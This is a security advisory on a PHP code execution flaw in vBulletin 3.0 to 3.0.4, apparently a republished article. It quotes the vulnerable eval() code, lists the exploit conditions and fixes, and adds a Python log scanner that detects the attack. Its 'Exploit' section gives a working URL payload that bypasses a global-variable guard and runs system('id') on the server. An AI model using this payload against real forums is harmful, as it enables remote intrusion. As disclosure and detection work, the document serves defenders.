
vBulletin 3.0.x PHP Code Execution Vulnerability

Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4

Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6

Vulnerable code in forumdisplay.php:
#############################################################
if ($vboptions['showforumusers'])
{
.
.
.
.

if ($bbuserinfo['userid'])
{
.
.
.
.
$comma = ', '; // assigned here only when userid is non-zero (logged-in user)
}
.
.
.
.
while ($loggedin = $DB_site->fetch_array($forumusers))
{
.
.
.
eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser')
. '";'); // <<==== (Vuln): $comma is concatenated into the eval()'d string
$comma = ', ';
.
.
}
.
.
}

#############################################################


Conditions:
----------------
1st condition: $vboptions['showforumusers'] == True; the admin must set
showforumusers ON in the vBulletin options.
2nd condition: $bbuserinfo['userid'] == 0; you must be a visitor/guest.
3rd condition: $DB_site->fetch_array($forumusers) == True; when you
visit the forum, it must have at least one user shown as viewing it.
4th condition: magic_quotes_gpc must be OFF.
SPECIAL condition: you must bypass the unset($GLOBALS["$_arrykey"]) code in
init.php with the secret array GLOBALS[]=1 ;)))


Solutions:
----------------
* Disable showforumusers in the vBulletin options.
* Add the following line before if ($vboptions['showforumusers']):
$comma = '';

Exploit:
----------------
Example:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
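
Detection check for the request shape described above, as an added example that is not part of the original advisory: it scans web server access logs for forumdisplay.php requests carrying a GLOBALS or comma parameter. The combined log format, the function names and the sample log lines are assumptions made for illustration, and only the query string in the request line is inspected.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache/Nginx "combined" log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return the reasons a request target matches the advisory's pattern."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/forumdisplay.php"):
        return []
    reasons = []
    # parse_qsl percent-decodes names, so GLOBALS%5B%5D is seen as GLOBALS[].
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        base = name.split("[", 1)[0]
        if base == "GLOBALS":
            reasons.append("GLOBALS parameter (init.php unset() bypass)")
        elif base == "comma":
            reasons.append("comma parameter (reaches eval for guests)")
    return reasons

def scan(lines):
    """Yield (client_ip, target, reasons) for each matching log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = suspicious_params(m.group("target"))
        if reasons:
            yield line.split(" ", 1)[0], m.group("target"), reasons

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2006:10:00:01 +0000] "GET /forumdisplay.php?f=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jun/2006:10:00:05 +0000] "GET /forumdisplay.php?GLOBALS%5B%5D=1&f=2&comma=x HTTP/1.1" 200 5333 "-" "-"',
    '203.0.113.4 - - [10/Jun/2006:10:00:09 +0000] "GET /showthread.php?t=9&comma=x HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

Neither parameter name is used by the visible forumdisplay.php code for normal browsing, so any hit on a 3.0 to 3.0.4 install is worth reviewing together with the showforumusers setting.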

 

 

Article source: http://www.hackhome.com/html/wlcl/wlaq/2006/0610/26615.html
